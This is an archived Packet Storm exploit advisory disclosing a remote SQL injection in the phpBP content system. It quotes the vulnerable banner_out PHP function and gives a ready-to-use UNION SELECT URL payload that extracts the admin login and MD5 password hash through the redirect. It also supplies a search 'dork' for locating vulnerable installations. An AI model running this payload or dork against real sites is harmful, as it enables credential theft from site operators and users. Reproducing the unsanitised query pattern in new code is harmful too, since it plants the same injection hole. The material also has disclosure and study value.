phpbp-sql.txt

2008-03-17T00:00:00
ID PACKETSTORM:64612
Type packetstorm
Reporter irk4z
Modified 2008-03-17T00:00:00

Description

                                        
                                            `.-----------------------------------------------------------------------------.  
| vuln.: phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability |  
| download: http://www.phpbp.com/ |  
| dork: "PHP BP Team" |  
| |  
| author: irk4z@yahoo.pl |  
| homepage: http://irk4z.wordpress.com/ |  
| |  
| ---> HACKBOX.pl <--- |  
| |  
| greets to: cOndemned, str0ke, wacky |  
'-----------------------------------------------------------------------------'  
  
# code:  
  
./includes/functions/banners-external.php:  
...  
3 function banner_out() //zlicza ilosc klikniec na banner  
4 {  
5 global $conf;  
6   
7 if($_GET['id'])  
8 {  
9 SQLvalidate($_POST['id']);  
10  
11 $db = new dbquery;  
12 $db->query("SELECT * FROM $conf[prefix]banners WHERE id=$_GET[id]") or $db->err(__FILE__, __LINE__);   
13   
14 if($db->num_rows()==0)  
15 {  
16 redirect('index.php?module=error?error=banners_error2');  
17 exit;  
18 }   
19   
20 $d=$db->fetch_object();  
21 $db->query("UPDATE $conf[prefix]banners SET views=views+1 WHERE id='$_GET[id]'") or $db->err(__FILE__, __LINE__);   
22   
23 redirect($d->url);  
24 }  
25  
26 exit;  
27 }  
...  
  
# exploit:  
  
http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*  
  
you will be redirect to http://[login]_[md5_hash_pass] (ex. http://admin_21232f297a57a5a743894a0e4a801fc3/)  
  
`